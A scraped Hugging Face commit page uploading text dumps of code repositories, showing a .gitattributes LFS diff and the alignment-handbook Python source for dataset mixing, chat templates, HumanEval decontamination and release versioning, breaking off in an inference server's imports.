danidarko commited on
Commit
b1d4de0
1 Parent(s): d7abeb1

Upload 59 files

Browse files
This view is limited to 50 files because it contains too many changes.   See raw diff
Files changed (50) hide show
  1. .gitattributes +4 -0
  2. huggingface_WebShop.txt +0 -0
  3. huggingface_accelerate.txt +0 -0
  4. huggingface_alignment-handbook.txt +405 -0
  5. huggingface_api-inference-community.txt +213 -0
  6. huggingface_autotrain-advanced.txt +0 -0
  7. huggingface_candle.txt +1540 -0
  8. huggingface_controlnet_aux.txt +0 -0
  9. huggingface_dataset-viewer.txt +0 -0
  10. huggingface_datasets.txt +0 -0
  11. huggingface_dataspeech.txt +220 -0
  12. huggingface_datatrove.txt +0 -0
  13. huggingface_diffusers.txt +0 -0
  14. huggingface_diffusion-fast.txt +160 -0
  15. huggingface_diffusion-models-class.txt +62 -0
  16. huggingface_distil-whisper.txt +0 -0
  17. huggingface_docmatix.txt +604 -0
  18. huggingface_evaluate.txt +0 -0
  19. huggingface_hugginface_datasets.txt +0 -0
  20. huggingface_huggingface-inference-toolkit.txt +543 -0
  21. huggingface_huggingface-llama-recipes.txt +141 -0
  22. huggingface_huggingface_hub.txt +0 -0
  23. huggingface_lerobot.txt +0 -0
  24. huggingface_lm-evaluation-harness.txt +0 -0
  25. huggingface_notebooks.txt +1057 -0
  26. huggingface_open-muse.txt +0 -0
  27. huggingface_open_asr_leaderboard.txt +882 -0
  28. huggingface_optimum-benchmark.txt +0 -0
  29. huggingface_optimum-nvidia.txt +1270 -0
  30. huggingface_optimum-quanto.txt +0 -0
  31. huggingface_optimum.txt +0 -0
  32. huggingface_peft.txt +0 -0
  33. huggingface_pixparse.txt +0 -0
  34. huggingface_pytorch-image-models.txt +0 -0
  35. huggingface_safetensors.txt +1038 -0
  36. huggingface_segment-anything-2.txt +0 -0
  37. huggingface_setfit.txt +0 -0
  38. huggingface_speech-to-speech.txt +1208 -0
  39. huggingface_text-embeddings-inference.txt +385 -0
  40. huggingface_text-generation-inference.txt +0 -0
  41. huggingface_tokenizers.txt +1157 -0
  42. huggingface_transformers-bloom-inference.txt +1235 -0
  43. huggingface_transformers.txt +3 -0
  44. huggingface_trl.txt +0 -0
  45. python_libs_keras.txt +0 -0
  46. python_libs_matplotlib.txt +0 -0
  47. python_libs_numpy.txt +0 -0
  48. python_libs_opencv.txt +0 -0
  49. python_libs_pandas.txt +0 -0
  50. python_libs_plotly.py.txt +3 -0
.gitattributes CHANGED
@@ -56,3 +56,7 @@ saved_model/**/* filter=lfs diff=lfs merge=lfs -text
56
  # Video files - compressed
57
  *.mp4 filter=lfs diff=lfs merge=lfs -text
58
  *.webm filter=lfs diff=lfs merge=lfs -text
 
 
 
 
 
56
  # Video files - compressed
57
  *.mp4 filter=lfs diff=lfs merge=lfs -text
58
  *.webm filter=lfs diff=lfs merge=lfs -text
59
+ huggingface_transformers.txt filter=lfs diff=lfs merge=lfs -text
60
+ python_libs_plotly.py.txt filter=lfs diff=lfs merge=lfs -text
61
+ python_libs_pytorch.txt filter=lfs diff=lfs merge=lfs -text
62
+ python_libs_tensorflow.txt filter=lfs diff=lfs merge=lfs -text
huggingface_WebShop.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_accelerate.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_alignment-handbook.txt ADDED
@@ -0,0 +1,405 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # File: alignment-handbook-main/src/alignment/__init__.py
2
+ __version__ = '0.3.0.dev0'
3
+ from .configs import DataArguments, DPOConfig, H4ArgumentParser, ModelArguments, SFTConfig
4
+ from .data import apply_chat_template, get_datasets
5
+ from .decontaminate import decontaminate_humaneval
6
+ from .model_utils import get_checkpoint, get_kbit_device_map, get_peft_config, get_quantization_config, get_tokenizer, is_adapter_model
7
+ __all__ = ['DataArguments', 'DPOConfig', 'H4ArgumentParser', 'ModelArguments', 'SFTConfig', 'apply_chat_template', 'get_datasets', 'decontaminate_humaneval', 'get_checkpoint', 'get_kbit_device_map', 'get_peft_config', 'get_quantization_config', 'get_tokenizer', 'is_adapter_model']
8
+
9
+ # File: alignment-handbook-main/src/alignment/configs.py
10
+ import dataclasses
11
+ import os
12
+ import sys
13
+ from dataclasses import dataclass, field
14
+ from typing import Any, Dict, List, NewType, Optional, Tuple
15
+ from transformers import MODEL_FOR_CAUSAL_LM_MAPPING, HfArgumentParser
16
+ import trl
17
+ MODEL_CONFIG_CLASSES = list(MODEL_FOR_CAUSAL_LM_MAPPING.keys())
18
+ MODEL_TYPES = tuple((conf.model_type for conf in MODEL_CONFIG_CLASSES))
19
+ DataClassType = NewType('DataClassType', Any)
20
+
21
+ class H4ArgumentParser(HfArgumentParser):
22
+
23
+ def parse_yaml_and_args(self, yaml_arg: str, other_args: Optional[List[str]]=None) -> List[dataclass]:
24
+ arg_list = self.parse_yaml_file(os.path.abspath(yaml_arg))
25
+ outputs = []
26
+ other_args = {arg.split('=')[0].strip('-'): arg.split('=')[1] for arg in other_args}
27
+ used_args = {}
28
+ for (data_yaml, data_class) in zip(arg_list, self.dataclass_types):
29
+ keys = {f.name for f in dataclasses.fields(data_yaml) if f.init}
30
+ inputs = {k: v for (k, v) in vars(data_yaml).items() if k in keys}
31
+ for (arg, val) in other_args.items():
32
+ if arg in keys:
33
+ base_type = data_yaml.__dataclass_fields__[arg].type
34
+ inputs[arg] = val
35
+ if base_type in [int, float]:
36
+ inputs[arg] = base_type(val)
37
+ if base_type == List[str]:
38
+ inputs[arg] = [str(v) for v in val.split(',')]
39
+ if base_type is bool:
40
+ if val in ['true', 'True']:
41
+ inputs[arg] = True
42
+ else:
43
+ inputs[arg] = False
44
+ if arg not in used_args:
45
+ used_args[arg] = val
46
+ else:
47
+ raise ValueError(f'Duplicate argument provided: {arg}, may cause unexpected behavior')
48
+ obj = data_class(**inputs)
49
+ outputs.append(obj)
50
+ return outputs
51
+
52
+ def parse(self) -> DataClassType | Tuple[DataClassType]:
53
+ if len(sys.argv) == 2 and sys.argv[1].endswith('.yaml'):
54
+ output = self.parse_yaml_file(os.path.abspath(sys.argv[1]))
55
+ elif len(sys.argv) > 2 and sys.argv[1].endswith('.yaml'):
56
+ output = self.parse_yaml_and_args(os.path.abspath(sys.argv[1]), sys.argv[2:])
57
+ else:
58
+ output = self.parse_args_into_dataclasses()
59
+ if len(output) == 1:
60
+ output = output[0]
61
+ return output
62
+
63
+ @dataclass
64
+ class ModelArguments:
65
+ base_model_revision: Optional[str] = field(default=None, metadata={'help': 'The base model checkpoint for weights initialization with PEFT adapters.'})
66
+ model_name_or_path: Optional[str] = field(default=None, metadata={'help': "The model checkpoint for weights initialization. Don't set if you want to train a model from scratch."})
67
+ model_revision: str = field(default='main', metadata={'help': 'The specific model version to use (can be a branch name, tag name or commit id).'})
68
+ model_code_revision: str = field(default=None, metadata={'help': 'The branch of the IFT model'})
69
+ torch_dtype: Optional[str] = field(default=None, metadata={'help': "Override the default `torch.dtype` and load the model under this dtype. If `auto` is passed, the dtype will be automatically derived from the model's weights.", 'choices': ['auto', 'bfloat16', 'float16', 'float32']})
70
+ tokenizer_name_or_path: Optional[str] = field(default=None, metadata={'help': 'The path to the tokenizer. Useful if you want to use a different tokenizer to the one stored in `model_name_or_path`.'})
71
+ trust_remote_code: bool = field(default=False, metadata={'help': 'Trust remote code when loading a model.'})
72
+ attn_implementation: Optional[str] = field(default=None, metadata={'help': 'Which attention implementation to use; you can use --attn_implementation=flash_attention_2, in which case you must install this manually by running `pip install flash-attn --no-build-isolation`'})
73
+ use_peft: bool = field(default=False, metadata={'help': 'Whether to use PEFT or not for training.'})
74
+ lora_r: Optional[int] = field(default=16, metadata={'help': 'LoRA R value.'})
75
+ lora_alpha: Optional[int] = field(default=32, metadata={'help': 'LoRA alpha.'})
76
+ lora_dropout: Optional[float] = field(default=0.05, metadata={'help': 'LoRA dropout.'})
77
+ lora_target_modules: Optional[List[str]] = field(default=None, metadata={'help': 'LoRA target modules.'})
78
+ lora_modules_to_save: Optional[List[str]] = field(default=None, metadata={'help': 'Model layers to unfreeze & train'})
79
+ load_in_8bit: bool = field(default=False, metadata={'help': 'use 8 bit precision'})
80
+ load_in_4bit: bool = field(default=False, metadata={'help': 'use 4 bit precision'})
81
+ bnb_4bit_quant_type: Optional[str] = field(default='nf4', metadata={'help': 'precise the quantization type (fp4 or nf4)'})
82
+ use_bnb_nested_quant: bool = field(default=False, metadata={'help': 'use nested quantization'})
83
+ bnb_4bit_quant_storage: Optional[str] = field(default='uint8', metadata={'help': 'storage type to pack the quanitzed 4-bit prarams.'})
84
+
85
+ def __post_init__(self):
86
+ if self.load_in_8bit and self.load_in_4bit:
87
+ raise ValueError("You can't use 8 bit and 4 bit precision at the same time")
88
+
89
+ @dataclass
90
+ class DataArguments:
91
+ chat_template: Optional[str] = field(default=None, metadata={'help': 'The chat template to use.'})
92
+ dataset_mixer: Optional[Dict[str, float]] = field(default=None, metadata={'help': 'Datasets and their proportions to be used for training ift/rl.'})
93
+ text_column: Optional[str] = field(default='text', metadata={'help': 'The column name to use for the text in the dataset (only used for continued pretraining).'})
94
+ dataset_splits: Optional[List[str]] = field(default_factory=lambda : ['train', 'test'], metadata={'help': 'List of train test splits to use in the dataset'})
95
+ dataset_configs: Optional[List[str]] = field(default=None, metadata={'help': "List of dataset config names. If given must be the same length as 'dataset_mixer' keys."})
96
+ preprocessing_num_workers: Optional[int] = field(default=None, metadata={'help': 'The number of processes to use for the preprocessing.'})
97
+ truncation_side: Optional[str] = field(default=None, metadata={'help': 'Truncation side to use for the tokenizer.'})
98
+ auto_insert_empty_system_msg: bool = field(default=True, metadata={'help': 'Whether to automatically insert an empty system message as the first message if `system` is mentioned in the chat template.'})
99
+
100
+ @dataclass
101
+ class SFTConfig(trl.SFTConfig):
102
+ hub_model_revision: Optional[str] = field(default='main', metadata={'help': 'The Hub model branch to push the model to.'})
103
+ logging_first_step: bool = field(default=True, metadata={'help': 'Whether to log and evaluate the first global_step or not.'})
104
+
105
+ @dataclass
106
+ class DPOConfig(trl.DPOConfig):
107
+ hub_model_revision: Optional[str] = field(default='main', metadata={'help': 'The Hub model branch to push the model to.'})
108
+ logging_first_step: bool = field(default=True, metadata={'help': 'Whether to log and evaluate the first global_step or not.'})
109
+ optim: Optional[str] = field(default='rmsprop')
110
+ remove_unused_columns: bool = field(default=False)
111
+
112
+ # File: alignment-handbook-main/src/alignment/data.py
113
+ import os
114
+ from typing import Any, List, Literal, Optional
115
+ from datasets import DatasetDict, concatenate_datasets, load_dataset, load_from_disk
116
+ from datasets.builder import DatasetGenerationError
117
+ from .configs import DataArguments
118
+ DEFAULT_CHAT_TEMPLATE = "{% for message in messages %}\n{% if message['role'] == 'user' %}\n{{ '<|user|>\n' + message['content'] + eos_token }}\n{% elif message['role'] == 'system' %}\n{{ '<|system|>\n' + message['content'] + eos_token }}\n{% elif message['role'] == 'assistant' %}\n{{ '<|assistant|>\n' + message['content'] + eos_token }}\n{% endif %}\n{% if loop.last and add_generation_prompt %}\n{{ '<|assistant|>' }}\n{% endif %}\n{% endfor %}"
119
+
120
+ def maybe_insert_system_message(messages, tokenizer):
121
+ if messages[0]['role'] == 'system':
122
+ return
123
+ chat_template = tokenizer.chat_template
124
+ if chat_template is None:
125
+ chat_template = tokenizer.get_chat_template()
126
+ if 'system' in chat_template or '<|im_start|>' in chat_template:
127
+ messages.insert(0, {'role': 'system', 'content': ''})
128
+
129
+ def apply_chat_template(example, tokenizer, task: Literal['sft', 'generation', 'rm', 'dpo'], auto_insert_empty_system_msg: bool=True):
130
+ if task in ['sft', 'generation']:
131
+ messages = example['messages']
132
+ if auto_insert_empty_system_msg:
133
+ maybe_insert_system_message(messages, tokenizer)
134
+ example['text'] = tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True if task == 'generation' else False)
135
+ elif task == 'rm':
136
+ if all((k in example.keys() for k in ('chosen', 'rejected'))):
137
+ chosen_messages = example['chosen']
138
+ rejected_messages = example['rejected']
139
+ if auto_insert_empty_system_msg:
140
+ maybe_insert_system_message(chosen_messages, tokenizer)
141
+ maybe_insert_system_message(rejected_messages, tokenizer)
142
+ example['text_chosen'] = tokenizer.apply_chat_template(chosen_messages, tokenize=False)
143
+ example['text_rejected'] = tokenizer.apply_chat_template(rejected_messages, tokenize=False)
144
+ else:
145
+ raise ValueError(f'Could not format example as dialogue for `rm` task! Require `[chosen, rejected]` keys but found {list(example.keys())}')
146
+ elif task in ['dpo', 'orpo']:
147
+ if all((k in example.keys() for k in ('chosen', 'rejected'))):
148
+ if not is_openai_format(example['chosen']) or not is_openai_format(example['rejected']):
149
+ raise ValueError(f'Could not format example as dialogue for `{task}` task! Require OpenAI format for all messages')
150
+ if 'prompt' in example and is_openai_format(example['prompt']):
151
+ prompt_messages = example['prompt']
152
+ chosen_messages = example['chosen']
153
+ rejected_messages = example['rejected']
154
+ else:
155
+ prompt_messages = example['chosen'][:-1]
156
+ chosen_messages = example['chosen'][-1:]
157
+ rejected_messages = example['rejected'][-1:]
158
+ if auto_insert_empty_system_msg:
159
+ maybe_insert_system_message(prompt_messages, tokenizer)
160
+ example['text_prompt'] = tokenizer.apply_chat_template(prompt_messages, tokenize=False)
161
+ example['text_chosen'] = tokenizer.apply_chat_template(chosen_messages, tokenize=False)
162
+ example['text_rejected'] = tokenizer.apply_chat_template(rejected_messages, tokenize=False)
163
+ else:
164
+ raise ValueError(f'Could not format example as dialogue for `{task}` task! Require either the `[chosen, rejected]` or `[prompt, chosen, rejected]` keys but found {list(example.keys())}')
165
+ else:
166
+ raise ValueError(f"Task {task} not supported, please ensure that the provided task is one of ['sft', 'generation', 'rm', 'dpo', 'orpo']")
167
+ return example
168
+
169
+ def is_openai_format(messages: Any) -> bool:
170
+ if isinstance(messages, list) and all((isinstance(message, dict) for message in messages)):
171
+ return all(('role' in message and 'content' in message for message in messages))
172
+ return False
173
+
174
+ def get_datasets(data_config: DataArguments | dict, splits: Optional[List[str]]=None, configs: Optional[List[str]]=None, columns_to_keep: Optional[List[str]]=None, shuffle: bool=True) -> DatasetDict:
175
+ if type(data_config) is DataArguments:
176
+ dataset_mixer = data_config.dataset_mixer
177
+ elif isinstance(data_config, dict):
178
+ dataset_mixer = data_config
179
+ else:
180
+ raise ValueError(f'Data config {data_config} not recognized.')
181
+ raw_datasets = mix_datasets(dataset_mixer, splits=splits, configs=configs, columns_to_keep=columns_to_keep, shuffle=shuffle)
182
+ return raw_datasets
183
+
184
+ def mix_datasets(dataset_mixer: dict, splits: Optional[List[str]]=None, configs: Optional[List[str]]=None, columns_to_keep: Optional[List[str]]=None, shuffle=True) -> DatasetDict:
185
+ splits = ['train', 'test'] if splits is None else splits
186
+ configs = [None] * len(dataset_mixer) if not configs else configs
187
+ columns_to_keep = [] if columns_to_keep is None else columns_to_keep
188
+ if configs is not None and len(configs) != len(dataset_mixer):
189
+ raise ValueError('The number of given dataset config names must be the same as the given number of datasets.')
190
+ raw_datasets = DatasetDict()
191
+ raw_train_datasets = []
192
+ raw_val_datasets = []
193
+ fracs = []
194
+ for ((ds, frac), ds_config) in zip(dataset_mixer.items(), configs):
195
+ fracs.append(frac)
196
+ for split in splits:
197
+ try:
198
+ dataset = load_dataset(ds, ds_config, split=split)
199
+ except DatasetGenerationError:
200
+ dataset = load_from_disk(os.path.join(ds, split))
201
+ dataset = dataset.remove_columns([col for col in dataset.column_names if col not in columns_to_keep])
202
+ if 'train' in split:
203
+ raw_train_datasets.append(dataset)
204
+ elif 'test' in split:
205
+ raw_val_datasets.append(dataset)
206
+ else:
207
+ raise ValueError(f'Split type {split} not recognized as one of test or train.')
208
+ if any((frac < 0 for frac in fracs)):
209
+ raise ValueError('Dataset fractions cannot be negative.')
210
+ if len(raw_train_datasets) > 0:
211
+ train_subsets = []
212
+ for (dataset, frac) in zip(raw_train_datasets, fracs):
213
+ train_subset = dataset.select(range(int(frac * len(dataset))))
214
+ train_subsets.append(train_subset)
215
+ if shuffle:
216
+ raw_datasets['train'] = concatenate_datasets(train_subsets).shuffle(seed=42)
217
+ else:
218
+ raw_datasets['train'] = concatenate_datasets(train_subsets)
219
+ if len(raw_val_datasets) > 0:
220
+ if shuffle:
221
+ raw_datasets['test'] = concatenate_datasets(raw_val_datasets).shuffle(seed=42)
222
+ else:
223
+ raw_datasets['test'] = concatenate_datasets(raw_val_datasets)
224
+ if len(raw_datasets) == 0:
225
+ raise ValueError(f'Dataset {dataset_mixer} not recognized with splits {splits}. Check the dataset has been correctly formatted.')
226
+ return raw_datasets
227
+
228
+ # File: alignment-handbook-main/src/alignment/decontaminate.py
229
+ from typing import Any, Dict, List
230
+ from datasets import load_dataset
231
+ HUMAN_EVAL_STRINGS_OK = ['return x + y', 'return len(string)', 'return n**2', 'return .join(strings)']
232
+
233
+ def extract_docstring(prompt: str) -> str:
234
+ if '"""' in prompt:
235
+ if prompt.count('"""') == 2:
236
+ return prompt.split('"""')[1].strip()
237
+ elif prompt.count('"""') == 4:
238
+ return prompt.split('"""')[3].strip()
239
+ else:
240
+ raise ValueError()
241
+ elif "'''" in prompt:
242
+ assert prompt.count("'''") == 2
243
+ return prompt.split("'''")[1].strip()
244
+ else:
245
+ raise ValueError()
246
+
247
+ def human_eval_docstrings() -> List[str]:
248
+ ds = load_dataset('openai_humaneval', split='test')
249
+ docstrings = [extract_docstring(v['prompt']) for v in ds]
250
+ return docstrings
251
+
252
+ def load_dataset_column(dataset: str, column: str, split: str, name=None) -> List[str]:
253
+ ds = load_dataset(dataset, split=split, name=name)
254
+ res = [sample[column].strip() for sample in ds]
255
+ return [sample for sample in res if len(sample) > 0]
256
+ FILTER_OUT = {'human_eval_docstrings': human_eval_docstrings(), 'human_eval_solutions': [s for s in load_dataset_column('openai_humaneval', 'canonical_solution', 'test') if s not in HUMAN_EVAL_STRINGS_OK]}
257
+
258
+ def normalize_whitespace(text: str) -> str:
259
+ return ' '.join(text.split())
260
+
261
+ def decontaminate_humaneval(samples: List[Dict[str, Any]], text_column: str='text', filter_out: Dict[str, List[str]]=FILTER_OUT) -> List[Dict[str, Any]]:
262
+ output = []
263
+ for content in samples[text_column]:
264
+ content = normalize_whitespace(content.lower())
265
+ matched = False
266
+ for (_, substrings) in filter_out.items():
267
+ for substring in substrings:
268
+ if normalize_whitespace(substring.lower()) in content:
269
+ matched = True
270
+ break
271
+ if matched:
272
+ break
273
+ output.append(not matched)
274
+ return output
275
+
276
+ # File: alignment-handbook-main/src/alignment/model_utils.py
277
+ import os
278
+ from pathlib import Path
279
+ from typing import Dict
280
+ import torch
281
+ from transformers import AutoTokenizer, BitsAndBytesConfig, PreTrainedTokenizer
282
+ from transformers.trainer_utils import get_last_checkpoint
283
+ from accelerate import Accelerator
284
+ from huggingface_hub import list_repo_files
285
+ from huggingface_hub.utils._errors import RepositoryNotFoundError
286
+ from huggingface_hub.utils._validators import HFValidationError
287
+ from peft import LoraConfig, PeftConfig
288
+ from .configs import DataArguments, DPOConfig, ModelArguments, SFTConfig
289
+ from .data import DEFAULT_CHAT_TEMPLATE
290
+
291
+ def get_current_device() -> int:
292
+ return Accelerator().local_process_index if torch.cuda.is_available() else 'cpu'
293
+
294
+ def get_kbit_device_map() -> Dict[str, int] | None:
295
+ return {'': get_current_device()} if torch.cuda.is_available() else None
296
+
297
+ def get_quantization_config(model_args: ModelArguments) -> BitsAndBytesConfig | None:
298
+ if model_args.load_in_4bit:
299
+ compute_dtype = torch.float16
300
+ if model_args.torch_dtype not in {'auto', None}:
301
+ compute_dtype = getattr(torch, model_args.torch_dtype)
302
+ quantization_config = BitsAndBytesConfig(load_in_4bit=True, bnb_4bit_compute_dtype=compute_dtype, bnb_4bit_quant_type=model_args.bnb_4bit_quant_type, bnb_4bit_use_double_quant=model_args.use_bnb_nested_quant, bnb_4bit_quant_storage=model_args.bnb_4bit_quant_storage).to_dict()
303
+ elif model_args.load_in_8bit:
304
+ quantization_config = BitsAndBytesConfig(load_in_8bit=True).to_dict()
305
+ else:
306
+ quantization_config = None
307
+ return quantization_config
308
+
309
+ def get_tokenizer(model_args: ModelArguments, data_args: DataArguments, auto_set_chat_template: bool=True) -> PreTrainedTokenizer:
310
+ tokenizer = AutoTokenizer.from_pretrained(model_args.model_name_or_path if model_args.tokenizer_name_or_path is None else model_args.tokenizer_name_or_path, revision=model_args.model_revision, trust_remote_code=model_args.trust_remote_code)
311
+ if tokenizer.pad_token_id is None:
312
+ tokenizer.pad_token_id = tokenizer.eos_token_id
313
+ if data_args.truncation_side is not None:
314
+ tokenizer.truncation_side = data_args.truncation_side
315
+ if tokenizer.model_max_length > 100000:
316
+ tokenizer.model_max_length = 2048
317
+ if data_args.chat_template is not None:
318
+ tokenizer.chat_template = data_args.chat_template
319
+ elif auto_set_chat_template and tokenizer.get_chat_template() is None:
320
+ tokenizer.chat_template = DEFAULT_CHAT_TEMPLATE
321
+ return tokenizer
322
+
323
+ def get_peft_config(model_args: ModelArguments) -> PeftConfig | None:
324
+ if model_args.use_peft is False:
325
+ return None
326
+ peft_config = LoraConfig(r=model_args.lora_r, lora_alpha=model_args.lora_alpha, lora_dropout=model_args.lora_dropout, bias='none', task_type='CAUSAL_LM', target_modules=model_args.lora_target_modules, modules_to_save=model_args.lora_modules_to_save)
327
+ return peft_config
328
+
329
+ def is_adapter_model(model_name_or_path: str, revision: str='main') -> bool:
330
+ try:
331
+ repo_files = list_repo_files(model_name_or_path, revision=revision)
332
+ except (HFValidationError, RepositoryNotFoundError):
333
+ repo_files = os.listdir(model_name_or_path)
334
+ return 'adapter_model.safetensors' in repo_files or 'adapter_model.bin' in repo_files
335
+
336
+ def get_checkpoint(training_args: SFTConfig | DPOConfig) -> Path | None:
337
+ last_checkpoint = None
338
+ if os.path.isdir(training_args.output_dir):
339
+ last_checkpoint = get_last_checkpoint(training_args.output_dir)
340
+ return last_checkpoint
341
+
342
+ # File: alignment-handbook-main/src/alignment/release.py
343
+ import argparse
344
+ import re
345
+ import packaging.version
346
+ REPLACE_PATTERNS = {'init': (re.compile('^__version__\\s+=\\s+"([^"]+)"\\s*$', re.MULTILINE), '__version__ = "VERSION"\n'), 'setup': (re.compile('^(\\s*)version\\s*=\\s*"[^"]+",', re.MULTILINE), '\\1version="VERSION",'), 'citation': (re.compile('^version:\\s+[^ ]+', re.MULTILINE), 'version: VERSION'), 'readme': (re.compile('version\\s+=\\s+\\{[^}]+\\}', re.MULTILINE), 'version = {VERSION}')}
347
+ README_FILE = 'README.md'
348
+ REPLACE_FILES = {'init': 'src/alignment/__init__.py', 'setup': 'setup.py', 'citation': 'CITATION.cff', 'readme': README_FILE}
349
+
350
+ def update_version_in_file(fname, version, pattern):
351
+ with open(fname, 'r', encoding='utf-8', newline='\n') as f:
352
+ code = f.read()
353
+ (re_pattern, replace) = REPLACE_PATTERNS[pattern]
354
+ replace = replace.replace('VERSION', version)
355
+ code = re_pattern.sub(replace, code)
356
+ with open(fname, 'w', encoding='utf-8', newline='\n') as f:
357
+ f.write(code)
358
+
359
+ def global_version_update(version, patch=False):
360
+ for (pattern, fname) in REPLACE_FILES.items():
361
+ update_version_in_file(fname, version, pattern)
362
+
363
+ def get_version():
364
+ with open(REPLACE_FILES['init'], 'r') as f:
365
+ code = f.read()
366
+ default_version = REPLACE_PATTERNS['init'][0].search(code).groups()[0]
367
+ return packaging.version.parse(default_version)
368
+
369
+ def pre_release_work(patch=False):
370
+ default_version = get_version()
371
+ if patch and default_version.is_devrelease:
372
+ raise ValueError("Can't create a patch version from the dev branch, checkout a released version!")
373
+ if default_version.is_devrelease:
374
+ default_version = default_version.base_version
375
+ elif patch:
376
+ default_version = f'{default_version.major}.{default_version.minor}.{default_version.micro + 1}'
377
+ else:
378
+ default_version = f'{default_version.major}.{default_version.minor + 1}.0'
379
+ version = input(f'Which version are you releasing? [{default_version}]')
380
+ if len(version) == 0:
381
+ version = default_version
382
+ print(f'Updating version to {version}.')
383
+ global_version_update(version, patch=patch)
384
+
385
+ def post_release_work():
386
+ current_version = get_version()
387
+ dev_version = f'{current_version.major}.{current_version.minor + 1}.0.dev0'
388
+ current_version = current_version.base_version
389
+ version = input(f'Which version are we developing now? [{dev_version}]')
390
+ if len(version) == 0:
391
+ version = dev_version
392
+ print(f'Updating version to {version}.')
393
+ global_version_update(version)
394
+ if __name__ == '__main__':
395
+ parser = argparse.ArgumentParser()
396
+ parser.add_argument('--post_release', action='store_true', help='Whether this is pre or post release.')
397
+ parser.add_argument('--patch', action='store_true', help='Whether or not this is a patch release.')
398
+ args = parser.parse_args()
399
+ if not args.post_release:
400
+ pre_release_work(patch=args.patch)
401
+ elif args.patch:
402
+ print('Nothing to do after a patch :-)')
403
+ else:
404
+ post_release_work()
405
+
huggingface_api-inference-community.txt ADDED
@@ -0,0 +1,213 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # File: api-inference-community-master-old/main.py
2
+ import json
3
+ import os
4
+ import tempfile
5
+ import time
6
+ from io import BytesIO
7
+ from mimetypes import guess_extension
8
+ from typing import Any, Dict, List, Optional, Tuple
9
+ import librosa
10
+ import psutil
11
+ import requests
12
+ import soundfile
13
+ import timm
14
+ import torch
15
+ import uvicorn
16
+ from asteroid import separate
17
+ from asteroid.models import BaseModel as AsteroidBaseModel
18
+ from espnet2.bin.asr_inference import Speech2Text
19
+ from espnet2.bin.tts_inference import Text2Speech
20
+ from PIL import Image
21
+ from starlette.applications import Starlette
22
+ from starlette.background import BackgroundTask
23
+ from starlette.middleware import Middleware
24
+ from starlette.middleware.cors import CORSMiddleware
25
+ from starlette.requests import Request
26
+ from starlette.responses import FileResponse, JSONResponse
27
+ from starlette.routing import Route
28
+ from transformers import Speech2TextForConditionalGeneration, Speech2TextProcessor, Wav2Vec2ForCTC, Wav2Vec2Tokenizer
29
+ HF_HEADER_COMPUTE_TIME = 'x-compute-time'
30
+ AnyModel = Any
31
+ AnyTokenizer = Any
32
+ EXAMPLE_TTS_EN_MODEL_ID = 'julien-c/ljspeech_tts_train_tacotron2_raw_phn_tacotron_g2p_en_no_space_train'
33
+ EXAMPLE_TTS_ZH_MODEL_ID = 'julien-c/kan-bayashi_csmsc_tacotron2'
34
+ EXAMPLE_ASR_EN_MODEL_ID = 'julien-c/mini_an4_asr_train_raw_bpe_valid'
35
+ EXAMPLE_SEP_ENH_MODEL_ID = 'mhu-coder/ConvTasNet_Libri1Mix_enhsingle'
36
+ EXAMPLE_SEP_SEP_MODEL_ID = 'julien-c/DPRNNTasNet-ks16_WHAM_sepclean'
37
+ WAV2VEV2_MODEL_IDS = ['facebook/wav2vec2-base-960h', 'facebook/wav2vec2-large-960h-lv60-self', 'facebook/wav2vec2-large-xlsr-53-dutch', 'facebook/wav2vec2-large-xlsr-53-french', 'facebook/wav2vec2-large-xlsr-53-german', 'facebook/wav2vec2-large-xlsr-53-italian', 'facebook/wav2vec2-large-xlsr-53-spanish', 'facebook/wav2vec2-large-xlsr-53-portuguese']
38
